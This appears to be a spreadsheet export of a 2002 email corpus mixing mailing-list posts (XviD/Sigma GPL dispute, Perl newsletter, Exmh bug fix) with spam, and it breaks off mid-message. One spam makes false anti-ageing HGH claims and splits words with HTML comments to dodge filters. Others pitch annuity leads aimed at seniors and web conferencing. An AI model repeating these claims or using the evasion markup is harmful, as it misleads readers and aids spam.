 [Update] Sigma has issued a press release announcing the availability of
 the source code of their MPEG-4 codec and it's already up for download.
 However, not a word was lost about the XviD issue and the press release
 makes one think that the Sigma codec was entirely developed by Sigma so we
 might be hearing more about this.
 [Update] I found a GPL notice in some of the source code files, but it
 also looks like Sigma placed their own copyright lines there and XviD
 doesn't get any credit in the source either. The GPL notice also collides
 with Sigma's Software Licensing Agreement that you have to sign before
 downloading codec or source. On on the same issue DivXNetworks said they'd
 fully support XviD in this issue and apparently DXn's relationship with
 Sigma didn't really work out either, as Sigma's Xcard is not as DivX
 compatible as it was advertised.
 [Update]First an update on the XviD situation. The release of the Sigma
 source code does not mean it's all over, it's far from being over. The
 license agreement which you have to agree to before you can download, and
 install the codec is not compatible with the GPL. Furthermore, it can now
 clearly be seen (download the source code and have a look for yourself)
 that the Sigma codec is pretty much a copy of the XviD codec, but all the
 copyright notices of the original developers have been removed and
 replaced. This does not only violate the GPL but copyright laws - you
 can't just take a program, change a few lines and change the copyright
 statements, you only have copyright protection for the parts you wrote on
 your own. And related to this the Sigma codec also contains code taken
 from the OpenDivX project, the files were outfitted with 2 different
 copyright notices which is quite funny."
 [1] http://www.xvid.org/
 [2] http://www.sigmadesigns.com
 [3] http://www.doom9.org/
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Stories for 2002-09-18
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Newsletter
 In this issue:
     * Subscribe to The Perl Review
 +--------------------------------------------------------------------+
 | Subscribe to The Perl Review                                       |
 |   posted by pudge on Tuesday September 17, @08:00 (links)          |
 |   http://use.perl.org/article.pl?sid=02/09/17/121210               |
 +--------------------------------------------------------------------+
 [0]barryp writes "You can now pledge a subscription to [1]The Perl Review.
 The plan is to produce four print magazines per year. Cost: $12/year
 (US); $20/year (international). Let's all make this happen by signing
 up!" The web site says that they'll attempt to go print if they get
 enough subscription pledges.
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/09/17/121210
 Links:
     0. mailto:paul.barry@itcarlow.ie
     1. http://www.theperlreview.com/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</si>
  <si>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FW: Bush blew take two
</t>
  </si>
  <si>
    <t xml:space="preserve">meant "gubernatorial PRIMARY."
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of Geege
 Schuman
 Sent: Wednesday, September 11, 2002 9:32 PM
 To: Tom; fork@example.com
 Subject: RE: Bush blew take two
 yeshterday we f*cked up our gubernatorial election, too.  results to be
 contested by reno.  same six districts that were sued in 2000 still came up
 gimpy.
 i suggested to jeb via e-mail we hold a run-off pinata party.  hoist up a
 papier mache donkey and a papier mache elephant.  first one to batted open
 wins.
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of Tom
 Sent: Wednesday, September 11, 2002 9:16 PM
 To: fork@example.com
 Subject: Bush blew take two
 http://www.washingtonpost.com/wp-dyn/articles/A63543-2002Sep10.html
 "MIAMI, Sept. 10 -- A two-gram rock of crack
 cocaine was found inside the shoe of Florida
 Gov. Jeb Bush's 25-year-old daughter by workers
 at the central Florida rehabilitation center
 where she is undergoing court-ordered drug
 treatment, Orlando police said today.
 Noelle Bush was not arrested because witnesses
 would not give sworn statements, but the
 incident is under investigation, according to
 Orlando police spokesman Orlando Rolon."
 Wow, the witnesses would not nark of a Bush girl in an era where there are
 no mare restrictions on being held without a cause?
 Imagine that...
 -tom
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_-1362576751P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;
 &gt; Date:  Thu, 01 Aug 2002 13:09:56 -0500
 &gt;
 &gt; &gt; From:  Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;
 &gt; &gt; Date:  Thu, 01 Aug 2002 10:01:04 -0500
 &gt; &gt;
 &gt; &gt; &gt; If you run Pick, and then use the "New FTOC" button to show only
 &gt; &gt; &gt; those messages selected by pick, then the ftoc display was considered
 &gt; &gt; &gt; "invalid" in the old code.  This prevented the display from being cache
 &gt; d,
 &gt; &gt; &gt; and it meant that you could get back to the full folder display by
 &gt; &gt; &gt; clicking on the folder lablel.  That doesn't work anymore.  You have
 &gt; &gt; &gt; to resort to Rescan Folder.  In fact, when you change folders you
 &gt; &gt; &gt; continue to have the Pick results, not the new folder contents.
 &gt; &gt; &gt; If you go to a any folder and do Rescan, then it heals itself.
 &gt; &gt; 
 &gt; &gt; Well, that's obviously my fault.  Okay, will look when I get a chance.
 &gt; 
 &gt; My copy of the tree right now is full of organizational changes in 
 &gt; preparation for generalizing the unseen window for display of other 
 &gt; sequences, so I'll probably not check in a fix for this until I 
 &gt; stabilize that.
 I've checked in my organizational changes and I've checked in a fix for the 
 invalid sequence bug.
 My next task is to actually create a general sequences window now that the 
 data that it will display is available.
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_-1362576751P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9UEpJK9b4h5R0IUIRAly4AJ9JqYqattDLUZzch4PiTiuPPSa71wCfcmGj
 svaqQHz1vj1kC38IMUdkH7g=
 =8BBR
 -----END PGP SIGNATURE-----
 --==_Exmh_-1362576751P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Palladiated? (was re: wow - palladiated! (Re: Palladium: technical limits and implications))
</t>
  </si>
  <si>
    <t xml:space="preserve">Evidently, I have permission to pass this along. :-).
 Don't try this at home, boys and girls. This is a professional neologist at
 work...
 Cheers,
 RAH
 Comedy is not pretty...
 --- begin forwarded text
 Date: Wed, 7 Aug 2002 22:40:56 +0100
 From: Adam Back &lt;adam@cypherspace.org&gt;
 To: "R. A. Hettinga" &lt;rah@shipwright.com&gt;
 Cc: Adam Back &lt;adam@cypherspace.org&gt;
 Subject: wow - palladiated! (Re: Palladium: technical limits and implications)
 User-Agent: Mutt/1.2.2i
 On Wed, Aug 07, 2002 at 03:08:08PM -0400, R. A. Hettinga wrote:
 &gt; At 6:54 PM +0100 on 8/7/02, Adam Back wrote:
 &gt; &gt; Palladiumized
 &gt;
 &gt; Palladiated?
 &gt;
 &gt; ;-).
 that's pretty funny, rhymes with irradiated -- nice connotations of
 radioactive material with radioactive half-lives spewing
 life-hazardous neutron radiation ;-)
 Helps that palladium is in fact a heavy metal.  Man, perhaps Pd even
 _has_ a half-life on the decay path from plutonium down to lead or
 something.  That would be very funny.
 Adam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</si>
  <si>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In a message dated Wed, 24 Jul 2002 1:51:48 PM Eastern Standard Time, kra@monkey.org writes:
 &gt; 
 &gt; I guess that the reason that I disagree is that some groups arguing
 &gt; against any checks on genetic engineering use that same argument -
 &gt; "we've been doing it since prehistory, so we don't need to apply any
 &gt; caution today".
 &gt; 
 That the process of engineering is a natural, human inclination is what history proves; that humans don't learn from history is what natural, unimpeded inclinations prove.
 geege
 &gt; -- 
 &gt; Karl Anderson      kra@monkey.org           
 &gt; http://www.monkey.org/~kra/
 &gt; http://xent.com/mailman/listinfo/fork 
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: yyyy,GROW YOUNG WITH HGH!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body bgColor="#CCCCCC" topmargin=1 onMouseOver="window.status=''; return true" oncontextmenu="return false" ondragstart="return false" onselectstart="return false"&gt;
 Hello, jm@netexplorer.com&lt;BR&gt;
 &lt;BR&gt;
 As se&lt;!--5--&gt;en on NB&lt;!--D--&gt;C, CBS, and CN&lt;!--H--&gt;N, and even Opr&lt;!--D--&gt;ah!  The health&lt;br&gt;
 discove&lt;!--F--&gt;ry that actually revers&lt;!--D--&gt;es aging while burning fat,&lt;br&gt;
 with&lt;!--boy--&gt;out dieti&lt;!--D--&gt;ng or exerc&lt;!--F--&gt;ise!  This pro&lt;!--A--&gt;ven discovery has even&lt;br&gt;
 been report&lt;!--jm--&gt;ed on by the Ne&lt;!--test--&gt;w Engl&lt;!----&gt;and Jour&lt;!--F--&gt;nal of Medi&lt;!--F--&gt;cine.&lt;br&gt;
 For&lt;!--jm--&gt;get aging and d&lt;!----&gt;ieting forever!  And it's Gua&lt;!--S--&gt;ranteed!&lt;br&gt;
 &lt;br&gt;&lt;br&gt;
 * Red&lt;!--lo--&gt;uce body fat and build lean muscle WIT&lt;!--jm--&gt;HOUT EXERCISE!&lt;br&gt;
 * Enha&lt;!--jm--&gt;ce se&lt;!--la--&gt;xual perf&lt;!--hehe--&gt;ormance&lt;br&gt;
 * Rem&lt;!--jm--&gt;ove wrinkles and cellulite&lt;br&gt;
 * Lower blood pres&lt;!--jm--&gt;sure and improve choles&lt;!----&gt;terol profile&lt;br&gt;
 * Imp&lt;!--jm--&gt;rove sleep, vision and me&lt;!----&gt;mory&lt;br&gt;
 * Resto&lt;!--jm--&gt;re hair color and gro&lt;!----&gt;wth&lt;br&gt;
 * Stren&lt;!--jm--&gt;gthen the immune sys&lt;!----&gt;tem&lt;br&gt;
 * Incre&lt;!--jm--&gt;ase ener&lt;!----&gt;gy and card&lt;!----&gt;iac output&lt;br&gt;
 * Turn bac&lt;!--jm--&gt;k your body's biol&lt;!----&gt;ogical time cl&lt;!----&gt;ock 10-20 years&lt;br&gt;
 in 6 months of usage !!!&lt;br&gt;&lt;br&gt;
 &lt;a href="http://www.chinaniconline.com/ultimatehgh/"&gt;FOR FRE&lt;!--o--&gt;E INFO&lt;!--you--&gt;RMATION AND G&lt;!--love--&gt;ET FREE 
 1 MON&lt;!--jm--&gt;TH SUPPLY OF HG&lt;!----&gt;H CLICK HERE&lt;/a&gt;&lt;br&gt;&lt;BR&gt;&lt;br&gt;&lt;BR&gt;&lt;br&gt;&lt;BR&gt;&lt;br&gt;&lt;BR&gt;&lt;br&gt;&lt;BR&gt;&lt;br&gt;&lt;BR&gt;&lt;br&gt;&lt;BR&gt;&lt;br&gt;&lt;BR&gt;
 You are recei&lt;!--jm--&gt;ving this email as a subscr&lt;!----&gt;iber&lt;br&gt;
 to the Opt&lt;!--jm--&gt;-In Ameri&lt;!----&gt;ca Mailin&lt;!----&gt;g Lis&lt;!----&gt;t. &lt;br&gt;
 To remo&lt;!--jm--&gt;ve your&lt;!----&gt;self from all related mailli&lt;!--me--&gt;sts,&lt;br&gt;
 just &lt;a href="http://www.chinaniconline.com/ultimatehgh/remove.php?userid=jm@netexplorer.com"&gt; 
 Click Here&lt;/a&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Free Step-By-Step Seminar Presentation
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_571220_01C20CB0.79D206A0
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  Want 120-250 leads per month?
  Co-op dollars available for qualified producers!	
  	 We have the turnkey package on seminar selling!	
 ?	  Affluent Senior Lead Program 	
 ?	  FREEMulti-Media Annuity Selling System CD 	
 ?	  FREEStep-By-Step Seminar Presentation 	
 ?	  Exclusive Prospect/Client
  Marketing and Re-Marketing
  System 	
  Invest in your business with a guaranteed return on your investment!	
 *Must be contracted through PPMG with our top Annuity companies.
 PLUS a Very Special Offer From PPMG: 	
 Trip includes Deluxe Outside Cabin for Producer and Guest and Airfare
 from the nearest home city gateway!**
 ** As determined by PPMG Travel Coordinator. 	
 Ports of Call:	 
  800-330-1997 ext. 292	
 ? or ?
 Please fill out the form below for more information	 
 Name:	  	
 E-mail:	  	
 Phone:	  	
 City:	  	State:	  	 	
 We don't want anyone to receive our mailings who does not wish to
 receive them. This is a professional communication sent to insurance
 professionals. To be removed from this mailing list, DO NOT REPLY to
 this message. Instead, go here: http://www.insurancemail.net
 &lt;http://www.insurancemail.net&gt; 
 Legal Notice &lt;http://www.insiq.com/legal.htm&gt;  
 ------=_NextPart_000_571220_01C20CB0.79D206A0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;title&gt;Free Step-By-Step Seminar Presentation&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#ffffff"&gt;
 &lt;table border=3D"1" width=3D"550" bordercolor=3D"#000066" =
 cellspacing=3D"0" cellpadding=3D"0" align=3D"center"&gt;
   &lt;tr&gt;=20
     &lt;td width=3D"100%"&gt;=20
       &lt;table border=3D"0" width=3D"100%"&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;&lt;img =
 src=3D"http://iiq.us/images/ppmg/0605/20020603-101a.jpg" width=3D"540" =
 height=3D"45" alt=3D"Want 120-250 leads per month?"&gt;&lt;br&gt;
             &lt;img =
 src=3D"http://iiq.us/images/ppmg/0605/20020603-102a.gif" width=3D"540" =
 height=3D"31" alt=3D"Co-op dollars available for qualified =
 producers!"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;=20
             &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"210" rowspan=3D"2"&gt;&lt;img =
 src=3D"http://iiq.us/images/ppmg/0605/20020603-103.gif" width=3D"210" =
 height=3D"302"&gt;&lt;/td&gt;
                 &lt;td width=3D"330" valign=3D"top"&gt;&lt;img =
 src=3D"http://iiq.us/images/ppmg/0605/20020603-104a.gif" width=3D"330" =
 height=3D"133" alt=3D"We have the turnkey package on seminar =
 selling!"&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"330"&gt;=20
                   &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
                     &lt;tr&gt;=20
                       &lt;td width=3D"4%" align=3D"center" =
 valign=3D"middle" height=3D"32"&gt;&lt;font size=3D"4"&gt;&amp;#149;&lt;/font&gt;&lt;/td&gt;
                       &lt;td width=3D"96%" height=3D"32"&gt;
                         &lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"4"&gt;&amp;nbsp;Affluent Senior Lead Program&lt;/font&gt;&lt;/b&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;=20
                       &lt;td width=3D"4%" align=3D"center" =
 valign=3D"middle" height=3D"55"&gt;&lt;font size=3D"4"&gt;&amp;#149;&lt;/font&gt;&lt;/td&gt;
                       &lt;td width=3D"96%" height=3D"55"&gt;
                         &lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"4"&gt;&lt;img src=3D"http://iiq.us/images/ppmg/0605/20020603-2.gif" =
 width=3D"92" height=3D"43" align=3D"left" alt=3D"FREE"&gt;Multi-Media =
 Annuity Selling System CD&lt;/font&gt;&lt;/b&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;=20
                       &lt;td width=3D"4%" align=3D"center" =
 valign=3D"middle" height=3D"55"&gt;&lt;font size=3D"4"&gt;&amp;#149;&lt;/font&gt;&lt;/td&gt;
                       &lt;td width=3D"96%" height=3D"55"&gt;
                         &lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"4"&gt;&lt;img src=3D"http://iiq.us/images/ppmg/0605/20020603-2.gif" =
 width=3D"92" height=3D"43" align=3D"left" alt=3D"FREE"&gt;Step-By-Step =
 Seminar Presentation&lt;/font&gt;&lt;/b&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;=20
                       &lt;td width=3D"4%" align=3D"center" =
 valign=3D"baseline"&gt;&lt;font size=3D"4"&gt;&amp;#149;&lt;/font&gt;&lt;/td&gt;
                       &lt;td width=3D"96%"&gt;
                         &lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"4"&gt;&amp;nbsp;Exclusive Prospect/Client&lt;br&gt;
                         &amp;nbsp;Marketing and Re-Marketing&lt;br&gt;
                         &amp;nbsp;System &lt;/font&gt;&lt;/b&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;&lt;img =
 src=3D"http://iiq.us/images/ppmg/0605/20020603-3.gif" width=3D"499" =
 height=3D"108" alt=3D"Invest in your business with a guaranteed return =
 on your investment!"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"1"&gt;*Must be contracted through PPMG with our top Annuity =
 companies.&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"100%" colspan=3D"2"&gt;=20
             &lt;table border=3D"0" width=3D"100%" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"100%" bgcolor=3D"#000080"&gt;&lt;img border=3D"0" =
 src=3D"http://iiq.us/images/ppmg/spacer.gif" width=3D"1" =
 height=3D"1"&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"100%" colspan=3D"2"&gt;=20
             &lt;table border=3D"1" width=3D"100%" bordercolor=3D"#000066" =
 cellspacing=3D"0" cellpadding=3D"0"&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"100%"&gt;=20
                   &lt;table border=3D"0" width=3D"100%" cellspacing=3D"1"&gt;
                     &lt;tr&gt;=20
                       &lt;td width=3D"100%" bgcolor=3D"#000066" =
 align=3D"center"&gt; &lt;b&gt;&lt;font color=3D"#FFFFFF" face=3D"Verdana" =
 size=3D"4"&gt;PLUS a Very Special Offer From PPMG:&lt;/font&gt;&lt;/b&gt; &lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"100%" colspan=3D"2"&gt;&lt;img border=3D"0" =
 src=3D"http://iiq.us/images/ppmg/cruise1.gif" width=3D"550" =
 height=3D"200"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"100%" colspan=3D"2"&gt;=20
             &lt;table&gt;
               &lt;tr&gt;=20
                 &lt;td bgcolor=3D"#ffffff" valign=3D"top" width=3D"100%" =
 align=3D"center"&gt;=20
                   &lt;b&gt;&lt;font color=3D"#800080" face=3D"Arial" size=3D"4"&gt;=20
                   Trip includes Deluxe Outside Cabin for Producer and =
 Guest=20
                   and Airfare from the nearest home city gateway!**&lt;br&gt;
                   &lt;/font&gt;&lt;/b&gt;&lt;font color=3D"#000000" face=3D"Arial" =
 size=3D"1"&gt;=20
                   ** As determined by PPMG Travel Coordinator.&lt;/font&gt;=20
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"100%" colspan=3D"2"&gt; &lt;font =
 color=3D"#800080"&gt;Ports of Call:&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"100%" colspan=3D"2"&gt;&lt;img border=3D"0" =
 src=3D"http://iiq.us/images/ppmg/ports.gif" width=3D"550" =
 height=3D"50"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"100%" colspan=3D"2" align=3D"center"&gt;&lt;img =
 src=3D"http://iiq.us/images/ppmg/0605/20020603-4.gif" width=3D"540" =
 height=3D"160" alt=3D"800-330-1997 ext. 292"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td colspan=3D"2" align=3D"center"&gt;
             &lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;&lt;b&gt;&amp;#151; or &amp;#151;&lt;/b&gt;&lt;br&gt;
             &lt;table width=3D"95%" bgcolor=3D"#000000"&gt;
               &lt;tr&gt;=20
                 &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                   &lt;td&gt;=20
                     &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"2" align=3D"center" bgcolor=3D"#ffffff"&gt;
                       &lt;tr&gt;=20
                         &lt;td colspan=3D"5" align=3D"center" =
 bgcolor=3D"#000066"&gt;&lt;b&gt;&lt;font color=3D"#FFFFFF" size=3D"2"&gt;Please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value=3D"info@ppmg.net"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"PPMG Ad Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;/font&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"100%" colspan=3D"2" align=3D"center"&gt;&lt;img =
 border=3D"0" src=3D"http://iiq.us/images/ppmg/pp.gif" width=3D"544" =
 height=3D"21"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"100%" bgcolor=3D"#cccccc" align=3D"center"&gt;=20
             &lt;p&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"1"&gt;We =
 don't want=20
               anyone to receive our mailings who does not wish to =
 receive them.=20
               This is a professional communication sent to insurance =
 professionals.=20
               To be removed from this mailing list, &lt;b&gt;DO NOT REPLY&lt;/b&gt; =
 to this=20
               message. Instead, go here: &lt;a =
 href=3D"http://www.insurancemail.net"&gt;=20
               http://www.insurancemail.net&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;center&gt;
   &lt;a href=3D"http://www.insiq.com/legal.htm"&gt;&lt;font size=3D"1" =
 face=3D"Arial, Helvetica, sans-serif"&gt;Legal Notice&lt;/font&gt;&lt;/a&gt;=20
 &lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_571220_01C20CB0.79D206A0--
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; However, cracking and reverse engineering tools are not so ubiquitous on
 &gt; UNIX as they are on Windows platform for two main reasons:
 &gt;
 &gt; 1. The main customers of commercial Unices (Solaris, HP-UX, Aix, SCO...)
 &gt; are respectable companies. They are ready to pay big bucks for software
 &gt; they need: the reputation matters.
 &gt;
 &gt; 2. Most software for free and open source Unices like Linux and xBSD (this
 &gt; software often may be used on commercial unices as well) is, well, free and
 &gt; open source.
 Thanks to your answers, I start to see where I should head for.  What are your 
 sugestions for protecting a 100% online requirement system ?
 -- 
 Yannick Gingras
 Coder for OBB : Observing Bantu-speaking Butanone
 http://OpenBeatBox.org
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Reduce Travel Costs
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;New Web Technology&lt;/TITLE&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; charset=3Dwindows-12=
 52"&gt;
 &lt;META content=3D"MSHTML 5.50.4134.600" name=3DGENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY vLink=3D#c0c0c0 link=3D#c0c0c0 bgColor=3D#EAEAAE leftMargin=3D0&gt;&lt;FON=
 T 
 face=3DMicrosoft, Sans Sarif&gt;
 &lt;P&gt;
 &lt;CENTER&gt;
 &lt;TABLE width=3D560 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;B&gt;&lt;FONT color=3D#42426F size=3D6&gt;UNLIMITED WEB CON=
 FERENCING&lt;/font&gt;&lt;/b&gt;
       &lt;HR&gt;&lt;FONT color=3D#2F2F4F size=3D4&gt;Subscribe to the Web Conference C=
 enter for only $40.00 per month!
 &lt;/FONT&gt;
 &lt;br&gt;
 &lt;FONT color=3D#42426F size=3D3&gt;(Connects up to 15 participants at a time p=
 lus audio charges)&lt;/font&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;P&gt;
 &lt;TABLE width=3D475 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3D"left"&gt;&lt;FONT color=3D#2F2F4F size=3D3&gt;&lt;B&gt;
       &lt;LI&gt;Conduct real-time interactive meetings and presentations&lt;br&gt; ove=
 r the Internet 
       &lt;LI&gt;Application sharing
       &lt;LI&gt;Review and revise documents in real-time
       &lt;LI&gt;Record and archive your meeting 
       &lt;LI&gt;Simulate a live Classroom
       &lt;LI&gt;Quickly hold a meeting with anyone anywhere in the world
       &lt;LI&gt;Lowest rate $.18 per minute for audio (toll charges&lt;br&gt; included=
 ) Call anytime, from anywhere, to anywhere
       &lt;LI&gt;Quality, easy to use service&lt;/B&gt;&lt;/FONT&gt;&lt;/LI&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/=
 TABLE&gt;
 &lt;P&gt;
 &lt;TABLE width=3D500 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3D"left"&gt;&lt;FONT color=3D#42426F size=3D4&gt;&lt;B&gt;FREE DEMO&lt;/B&gt;&lt;/fo=
 nt&gt;
 &lt;BR&gt;&lt;BR&gt;
 &lt;FONT color=3D#42426F size=3D5&gt;&lt;B&gt;Eliminate or Reduce Travel Expense&lt;/b&gt;&lt;/=
 font&gt;
 &lt;BR&gt;&lt;FONT color=3D#2F2F4F size=3D4&gt;&lt;B&gt;
 Try this on for savings... 
 and turn those unnecessary trips into problem solving and fact finding con=
 ferences, 
 saving time and wear and tear on your overworked business staff. 
 &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;
 &lt;TABLE width=3D350 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;FONT color=3D#42426F size=3D4&gt;To find out more abo=
 ut this revolutionary concept,
 fill out the form below.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;&lt;FONT color=3D#2F2F4F size=3D2&gt;&lt;b&gt;Required Input Field&lt;FONT color=3D#5C=
 4033 
 size=3D2&gt;*&lt;/FONT&gt;&lt;/b&gt; 
 &lt;P&gt;
 &lt;TABLE cellSpacing=3D0 borderColorDark=3D#333300 cellPadding=3D3 width=3D6=
 00 
 borderColorLight=3D#ffffcc&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;
       &lt;FORM action=3Dmailto:conferencing1300@firemail.de?subject=3DWebC_In=
 quiry 
       method=3Dpost encType=3Dtext/plain&gt;
       &lt;TABLE width=3D"100%"&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F
           size=3D2&gt;&lt;b&gt;Name&lt;/b&gt;&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#5C4033 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DNAME&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F size=3D2=
 &gt;&lt;b&gt;Web 
             Address&lt;/b&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT value=3Dhttp:// name=3DURL&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F size=3D2=
 &gt;&lt;b&gt;Company 
             Name&lt;/b&gt;&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#5C4033
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DCOMPANY_NAME&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F size=3D2=
 &gt;&lt;b&gt;
